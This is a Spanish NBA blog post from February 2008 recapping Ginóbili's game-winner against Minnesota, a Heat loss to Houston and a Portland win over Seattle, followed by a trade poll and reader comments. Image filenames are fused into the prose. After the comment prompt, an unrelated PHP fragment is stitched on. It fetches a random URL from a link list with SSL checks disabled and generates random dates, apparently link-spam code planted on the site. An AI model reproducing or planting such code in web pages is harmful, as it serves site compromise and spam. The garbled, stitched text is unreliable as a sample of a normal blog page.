La crónica (21/02/08)

22 de February de 2008 por MagicJohnson32

Traspasos, traspasos y traspasos. ¿Que ayer también se jugaron partidos? ¿En serio? Pues sí, pocos pero con varias cosas destacables, empezando por un argentino que sigue on fire. Veamos una de las mejores jugadas de la noche y vayamos a por el resumen de lo sucedido.

La crónica:

Hace una semana, Manu Ginóbili destrozó a los Cavs con 46 puntos y 15 de 20 en tiros. Tal vez los Wolves tendrían que despedir a sus responsables de scouting (o al encargado de defender a Manu) porque ayer lo volvió a hacer. mcgradyheatdriveEsta vez no sólo hizo 44 con 13 de 18 en tiros sino que además anotó la canasta ganadora a 6 segundos para el final. Los Spurs, todavía sin Kurt Thomas aunque con Tony Parker de regreso, necesitaron la mejor versión del ex Kinder Bolonia y a un gran Duncan para superar 100-99 a los Wolves, en los que Jefferson, Telfair, Foye y McCants dieron muestras de su talento.

Mientras da la sensación de que los Spurs ganan casi por inercia, el caso opuesto lo tenemos en Miami. Los Heat suman 25 derrotas en sus últimos 26 partidos, aunque la de anoche llegó contra uno de los equipos más en forma de la liga, unos Rockets con la mejor racha de la franquicia desde la temporada 93-94, en la que se proclamaron campeones. McGrady mejoró notablementealdridgeclaps su nivel de juego reciente y contó de nuevo con buenas actuaciones de Yao y Alston, además de aportaciones sólidas de Battier, Scola y Landry. Para los Heat brilló Wade con 33 puntos y 11 asistencias, Marion logró otro doble-doble pero la defensa volvió a costarles la derrota, esta vez por 100-112.

Los Blazers necesitaban algo así. Nada mejor para acabar con una racha de derrotas que recibir a los Sonics, uno de los equipos más inofensivos de la liga, especialmente a domicilio. Portland, que había perdido 5 partidos seguidos y se ha alejado de las posiciones de Playoffs, sufrió para superar a los Sonics en el primer partido de éstos tras los traspasos cerrados poco antes del límite. Aún sin sus recién adquiridas incorporaciones, Seattle se apoyó en Earl Watson, que atraviesa un gran momento, y en los 20 puntos de Durant, pero Roy, Aldridge, Jack y Outlaw lograron entre 15 y 19 puntos para dar el triunfo a los de Oregon 88-92.manu44wolves

Nuestro MVP: Hoy no dudamos a la hora de decidir el jugador más valioso de la pasada noche. Manu Ginóbili atraviesa un momento dulce y anoche ganó el partido para los Spurs con una actuación descomunal, 44 puntos con 13 de 18 en tiros de campo, 7 de 9 en triples, 11 de 12 en libres, 4 asistencias en 37 minutos y la canasta ganadora a seis segundos para el final. Llega tarde para el All-Star pero a tiempo para los Playoffs.

El rookie: Carl Landry tiene el cariño de la afición de los Rockets y al fin se ha ganado la confianza de Adelman. Anoche hizo una de sus mejores actuaciones con 19 puntos en 25 minutos, 7 de 9 en tiros, 5 rebotes y alguna que otra acción espectacular.

La sorpresa: no ha habido ninguna actuación especialmente sorprendente, así que nos quedamos con el hecho, posiblemente sin precedentes, de que McCants, Foye y Telfair anotasen los 3 el 50% de sus lanzamientos de campo en un mismo partido. Recordemos que Foye y Telfair apenas alcanzan el 35% esta temporada. Eso sí, los Wolves perdieron.

La decepción: no es una estrella pero hubo un tiempo en el que Chris Wilcox cumplía con su papel. Anoche, ya sin Kurt Thomas en el equipo, Wilcox firmó una actuación desastrosa sin una sola canasta en juego, 2 rebotes y 4 faltas en 13 minutos.

Encuesta: una vez cerrado el plazo para traspasos ¿qué equipo se ha reforzado mejor durante la temporada?

A) Lakers (Trevor Ariza y Pau Gasol)

B) Cavaliers (Ben Wallace, Joe Smith, Wally Szscerbiak, Delonte West)

C) Mavericks (Jason Kidd, Antoine Wright y Malik Allen)

D) Suns (Shaquille O’Neal)

E) Spurs (Kurt Thomas y Damon Stoudamire)

F) Hawks (Mike Bibby)

G) Grizzlies (Kwame Brown y Jason Collins)

Comenta

6 comentarios a esta entrada

  1. txusma dice:
    #1

    Mal que me pase he de decir que han sido los Lakers, mas que nada pq lo han hecho casi sin dar nada a cambio. Ojito con los Cavs también y al terrible juego interior de Memphis.

      Citar

  2. Viva_Dirk dice:
    #2

    Y tanto que han sido los Lakers, a ver si Bynum vuelve bien.

    Terrible es una gran definición del juego interior de Memphis, jojo.

      Citar

  3. Gallis dice:
    #3

    Esta encuesta está manipulada…

    Como va a votar nadie a Memphis, si no se incluye a Javaris en sus refuerzos???

    Pediría la dimisión de mi socio, pero entonces habría que cerrar el blog, jojo.

      Citar

  4. RusticoColorao dice:
    #4

    ¿Ey el otro día Collins no metió 8 puntos o algo así? Claramente los mejor reforzados los bulls…ainsss

      Citar

  5. MagicJohnson32 dice:
    #5

    Sí, lo cierto es que ‘olvidé’ a Crittenton como el que no quiere la cosa.

    Pero vamos, dimito y listo.

    Collins hizo 8 puntazos y 10 rebotes el otro día. Casi ná.

    Eso sí, Kwame no juega ni un minuto, juas juas.

      Citar

  6. txusma dice:
    #6

    Pues si escribimos 2 y dimite uno veo la cosa complicada… 😀

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>